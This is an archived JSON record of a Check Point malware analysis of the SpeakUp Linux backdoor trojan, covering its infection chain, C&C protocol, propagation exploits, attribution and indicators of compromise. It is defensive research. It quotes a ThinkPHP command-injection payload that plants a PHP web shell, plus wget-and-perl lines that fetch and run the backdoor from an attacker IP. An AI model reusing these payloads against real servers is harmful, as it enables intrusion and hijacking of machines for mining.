{
	"id": "59c5f69e-c2f2-4dee-a175-071788bce393",
	"created_at": "2026-04-16T02:22:14.438509Z",
	"updated_at": "2026-04-18T02:22:13.728876Z",
	"deleted_at": null,
	"sha1_hash": "b793e22a8560bec69387ca43b9925a1ba6251bd7",
	"title": "SpeakUp: A New Undetected Backdoor Linux Trojan",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 97783,
	"plain_text": "SpeakUp: A New Undetected Backdoor Linux Trojan\r\nBy deugenio\r\nPublished: 2019-02-04 · Archived: 2026-04-16 02:01:43 UTC\r\nCheck Point Research has discovered a new campaign exploiting Linux servers to implant a new Backdoor Trojan.\r\nDubbed ‘SpeakUp’, the new Trojan exploits known vulnerabilities in six different Linux distributions.\r\nThe attack targets worldwide servers including AWS hosted machines.\r\nCheck Point researchers have spotted a new campaign exploiting Linux servers to implant a new Backdoor which evades all\r\nsecurity vendors. The new Trojan, named “SpeakUp” after one of its command and control names, exploits known\r\nvulnerabilities in six different Linux distributions. The attack is gaining momentum and targeting servers in East Asia and\r\nLatin America, including AWS hosted machines.\r\nSpeakUp acts to propagate internally within the infected subnet, and beyond to new IP ranges, exploiting remote code\r\nexecution vulnerabilities. In addition, SpeakUp presented ability to infect Mac devices with the undetected backdoor.\r\nWhile the exact identity of the threat actor behind this new attack is still unconfirmed, Check Point Researchers were able to\r\ncorrelate SpeakUp’s author with malware developer under the name of Zettabit. Although SpeakUp is implemented\r\ndifferently, it has a lot in common with Zettabit’s craftmanship.\r\nFigure 1: SpeakUp’s Victim Distribution\r\nhttps://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/\r\nPage 1 of 11\n\nFigure 2: SpeakUp’s propagation rate per day\r\nInfection Vector\r\nThe initial infection vector is targeting the recently reported vulnerability in ThinkPHP and uses command injection\r\ntechniques for uploading a PHP shell that serves and executes a Perl backdoor.\r\nThe exploitation is issued in three steps:\r\n1. Exploiting CVE-2018-20062 for uploading a PHP shell\r\nUsing a GET request, a remote command execution vulnerability in ThinkPHP (CVE-2018-20062) is sent to the targeted\r\nserver, as shown below:\r\ns=/index/\\think\\app/invokefunction\u0026function=call_user_func_array\u0026vars[0]=system\u0026vars[1][]=echo ^\u003c? php $action =\r\n$_GET[‘module’];system($action);? ^\u003e\u003eindex.php\r\nThis shell executes commands sent via the “module” parameter in a query.\r\n2. Serving the backdoor\r\nAnother HTTP request is sent to the targeted server, with the following resource:\r\n/?module=wget hxxp://67[.]209.177.163/ibus -O /tmp/e3ac24a0bcddfacd010a6c10f4a814bc\r\nThe above standard injection pulls the ibus payload and stores it on /tmp/e3ac24a0bcddfacd010a6c10f4a814bc\r\n3. Launching the backdoor\r\nThe execution is issued using an additional HTTP request:\r\n/?module=perl /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc;sleep 2;rm -rf /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc\r\nThat executes the perl script, puts it to sleep for two seconds and deletes the file to remove any evidence.\r\nBackdoor\r\nThe sample we analyzed was observed targeting a machine in China on January 14, 2019 and was first submitted to\r\nVirusTotal on January 9 2019. At the time of writing this article, it has no detections in VT.\r\nhttps://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/\r\nPage 2 of 11\n\nFigure 3: no detections for SpeakUp in Virus Total\r\nIn an attempt to endure the investigation process by security researchers, the second stage payload was encoded with salted\r\nbase64. To our dismay, the C\u0026C communication was also encoded with the same combination.\r\nThe revealed data contains multiple C\u0026C domains, IP addresses and other unique parameters, along with second-stage\r\npayloads and additional modules.\r\nIn the below analysis we will go through the malicious code, reveal the different functions and modules the Trojan runs on\r\nthe victim’s machine.\r\nVictim Registration\r\nSpeakUp uses POST and GET requests over HTTP to communicate with its main C\u0026C which is the compromised website\r\nof speakupomaha[.]com.\r\nThe first POST packet sends a victim ID and more introductory information such as the current version of the installed\r\nscript. (Currently 1.0.4)\r\nThe immediate first C\u0026C response is “needrgr” which means the infected victim is new to the server and needs a\r\nregistration.\r\nAfterwards, the Trojan posts “full information” about the machine by executing the following LINUX commands:\r\nUname (-r, -v, -m, -n,-a, -s)\r\nWhoami\r\nIfconfig –a\r\nArp –a\r\ncat /proc/cpuinfo | grep -c “cpu family” 2\u003e\u00261\r\nwho –b\r\nhttps://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/\r\nPage 3 of 11\n\nFigure 4: The registration process and introductory commands\r\nSpeakUp’s Main Functions\r\nAfter the registration process is completed, SpeakUp continuously communicates with its C\u0026C for new tasks on a fixed\r\n“knock” interval.\r\nThe following command types are available by the C\u0026C:\r\n“newtask”- Execute arbitrary code on the local machine, download and execute a file from any remote server, kill or\r\nuninstall the program and sends updated fingerprint data.\r\n“notask”- Sleep for 3 seconds and ask for additional command.\r\nnewerconfig”- Update the downloaded miner configuration file.\r\nSpeakUp’s persistence is ensured by using cron and an internal mutex to ensure only one instance remains alive at all times.\r\nPost-Infection Traffic\r\nOnce the victim is registered successfully, the C\u0026C begins sending new tasks. Most of them manipulate the machine to\r\ndownload and execute different files.\r\nAn interesting point to mention is the User-Agents in use. SpeakUp defines three User-Agents that the infected machine\r\nmust use in every communication with its C\u0026C. Two of them are MacOS X User-Agents and the third is a hashed string:\r\nMozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko)\r\nMobile/BADDAD\r\nMozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko)\r\nMobile/7B405\r\nE9BC3BD76216AFA560BFB5ACAF5731A3\r\nhttps://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/\r\nPage 4 of 11\n\nFigure 5: SpeakUp `s requests are encrypted with the salted base64 and include the unique User-Agent\r\nAt the moment SpeakUp serves XMRig miners to its listening infected servers.  According to XMRHunter the wallets hold a\r\ntotal of ~107 Monero coins.\r\nFigure 6: SpeakUp receives additional commands to execute, this time in plain text.\r\nPropagation\r\nSpeakUp also equips its backdoors with i (sic), a python script which allows the backdoor to scan and infect more Linux\r\nservers within its internal and external subnets. Its main functions are:\r\n1. Brute-force using a pre-defined list of usernames and passwords in an attempt to login to Admin panels.\r\n2. Scan the network environment of the infected machine; checks for availability of specific ports on servers that share\r\nthe same internal and external subnet mask (i.e 255.255.0.0\\16).\r\n3. Try to exploit the following Remote Code Execution vulnerabilities in the targeted servers:\r\na) CVE-2012-0874: JBoss Enterprise Application Platform Multiple Security Bypass Vulnerabilities\r\nb) CVE-2010-1871: JBoss Seam Framework remote code execution\r\nhttps://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/\r\nPage 5 of 11\n\nc) JBoss AS 3/4/5/6: Remote Command Execution (exploit)\r\nd) CVE-2017-10271: Oracle WebLogic wls-wsat Component Deserialization RCE\r\ne) CVE-2018-2894: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware.\r\nf) Hadoop YARN ResourceManager – Command Execution (exploit)\r\ng) CVE-2016-3088: Apache ActiveMQ Fileserver File Upload Remote Code Execution Vulnerability.\r\nA successful exploitation of one of the vulnerabilities will result in deploying the original ibus script on the exploited server.\r\nAttacker Identity and Leads\r\nIbus client for Unix OS\r\nInside the ibus script, we can see a short description about an IBus client for GNU Emacs. The IBus client is an open-source\r\nmultilingual input framework for Linux and Unix OS. While it supports all languages that do not use Latin letters, it seems\r\nthat the main audience is Asian users. The description and the file name are the only elements that link SpeakUp to the Ibus\r\nframework; the content has no similarities whatsoever.\r\nThis may imply a connection between SpeakUp to East Asia.\r\nUnique User-Agents\r\nThe unique User-Agents used in the HTTP communication between SpeakUp to the C\u0026C are a possible path to the identity\r\nof the threat actor behind this campaign.\r\nThe unique strings mainly consist of “Mobile/BADDAD“, “Mobile/7B405” and\r\n“E9BC3BD76216AFA560BFB5ACAF5731A3”.\r\nInterestingly enough, the string turned out to be the md5 hash of the word liteHTTP.\r\nGoogling liteHTTP leads to the liteHTTP github project.\r\nWhile liteHTTP is a C# based bot which targets Windows clients, its modules are somewhat similar to our SpeakUp Trojan.\r\nDownload \u0026 execute\r\nStartup (with persistence)\r\nCollection of system information (OS, version, installed location, etc.)\r\nSelf-update\r\nUninstall\r\nThis project was created by a user called zettabithf which is linked to a user with the same name in Hack Forums.\r\nhttps://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/\r\nPage 6 of 11\n\nFigure 7: Zettabit`s user description on Hack Forums\r\nThe Hack Forums profile may imply the author of SpeakUp backdoor is Russian speaking, as many of the comments are\r\nwritten in this language. He also seems to be a botnet developer, providing recommendations and publishing his LiteHTTP\r\nbot, which seems to have a well-designed GUI interface.\r\nAnother interesting thing to note is the use of the acronym “Knock” on several occasions in his posts. “Knock” also appears\r\nin several strings inside the code of SpeakUp.\r\nhttps://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/\r\nPage 7 of 11\n\nFigures 8 and 9: LiteHTTP screenshots taken from the user`s profile in which the acronym “Knock” appears\r\nConclusion\r\nSpeakUp`s obfuscated payloads and propagation technique is beyond any doubt the work of a bigger threat in the making. It\r\nis hard to imagine anyone would build such a compound array of payloads just to deploy few miners. The threat actor\r\nbehind this campaign can at any given time deploy additional payloads, potentially more intrusive and offensive. It has the\r\nability to scan the surrounding network of an infected server and distribute the malware. This campaign, while still relatively\r\nnew, can evolve into something bigger and potentially more harmful.\r\nIndeed, the threat actor behind this campaign, ‘Zettabithf’ himself, provides some ‘words of wisdom’ in this respect:\r\nhttps://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/\r\nPage 8 of 11\n\nCloudGuard IaaS is an advanced threat prevention technology that protects against on your cloud infrastructure, including\r\nnew Trojans like ‘SpeakUp’.\r\nThe Check Point IPS blade provides protections against these threats:\r\nCommand Injection Over HTTP\r\nNoneCMS ThinkPHP Remote Code Execution (CVE-2018-20062)\r\nOracle WebLogic WLS Security Component Remote Code Execution (CVE-2017-10271)\r\nOracle WebLogic WLS Server Component Arbitrary File Upload(CVE-2018-2894)\r\nHadoop YARN ResourceManager Remote Command Execution\r\nApache ActiveMQ Fileserver Multi Methods Directory Traversal(CVE-2016-3088)\r\nJBoss Seam 2 Framework Remote Code Execution (CVE-2010-1871)\r\nJBoss Enterprise Application Platform Invoker Servlets Remote Code Execution (CVE-2012-0874)\r\nRed Hat JBoss AS Remote Code Execution\r\nSuspicious Linux Shell Downloader\r\nThe Check Point Anti-Bot blade provides protections against this threat:\r\nLinux.SpeakUp\r\nIOCs\r\nMd5:\r\nSpeakUp Scripts:\r\n0a4e5831a2d3115acb3e989f0f660a6f\r\n0b5e1eb67be7c3020610b321f68375c1\r\n968d1906be7eb8321a3afac5fde77467\r\n074d7a4417d55334952d264c0345d885\r\nf357f32d7c2ddfef4b5850e7506c532b\r\nb6311bffcea117dceac5ccac0a243ae5\r\n2adf4e4512aaafab75e8411aa7121ffa\r\na73c7b777d31b0a8ef270809e2ed6510\r\n114cda60d215e44baeef22b7db0c64d5\r\n8f725fc5406ebf679c5c7ade3e8d5f70\r\n4a80a075c7c6b5e738a7f4b60b7b101f\r\ne18749e404baec2aa29f4af001164d1b\r\nhttps://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/\r\nPage 9 of 11\n\n1a377b5d5d2162327f0706cc84427780\r\n1da94e156609d7e880c413a124bad004\r\n713260a53eff05ad44aad8d6899f1c6e\r\n36cda3c77ba380d6388a01aafcbaa6c7\r\n0f83482368343f5c811bac84a395d2c0\r\n8dd6cb5f33d25512805c70bd3db5f433\r\ne4ca1e857034cbe0428d431c15ec8608\r\n36502273cee61825dc97d62a3dffe729\r\nf16c5a6342ccc253b1de177d3fa310b1\r\n08d7674532cc226931570e6a99d5ba30\r\n279c4aa955085480f3ad0c19aa36a93b\r\nXMRig Miners:\r\nf79be3df4cbfe81028040796733ab07f\r\na21a3d782d30b51515834a7bf68adc8e\r\nc572a10ca12f3bd9783c6d576aa080fb\r\nb60ec230644b740ca4dd6fd45059a4be\r\n5e6b6fcd7913ae4917b0cdb0f09bf539\r\nae875c496535be196449547a15205883\r\n068d424a1db93ec0c1f90f5e501449a3\r\n996e0c8190880c8bf1b8ffb0826cf30f\r\nC\u0026Cs:\r\n67[.]209.177.163\r\n173[.]82.104.196\r\n5[.]196.70.86\r\n120[.]79.247.183\r\n5[.]2.73.127/lnsqqFE2jK/pprtnp153WWW.php\r\nSpeakupomaha[.]com/misc/ui/images/Indxe.php\r\nLinuxservers[.]000webhostapp[.]com/hp.html\r\nlinuxsrv134[.]xp3[.]biz\r\nMonero Wallets:\r\n47UW2Qv7AB4CsD8L5WWSvx58ztrzHhcMeYN7AJry9aMZhGDLXGwBHLv8LpaDUxpmdWfqbbfrqpdieQAeVSMCU1qY4BFA\r\n4Aa3TcU7ixMVcYwbsw8ENVbFwt4ZuqrNBVij5TRvPCTpGRK5BKBHQPu7ahT7z2A6547a5Lcn7yPZV1xU22ZbviqxUX7JVuP\r\n4An3Radh69LgcTHJf1U3awa9ffej4b6DcUmEv8wirsDm8zRMSjifrwybH2AzHdEsW8eew3rFtk4QbGJMxqitfxmZJhABxpT\r\nhttps://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/\r\nPage 10 of 11\n\nSource: https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/\r\nhttps://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/"
	],
	"report_names": [
		"speakup-a-new-undetected-backdoor-linux-trojan"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-18T02:00:05.371962Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1776306134,
	"ts_updated_at": 1776478933,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b793e22a8560bec69387ca43b9925a1ba6251bd7.pdf",
		"text": "https://archive.orkl.eu/b793e22a8560bec69387ca43b9925a1ba6251bd7.txt",
		"img": "https://archive.orkl.eu/b793e22a8560bec69387ca43b9925a1ba6251bd7.jpg"
	}
}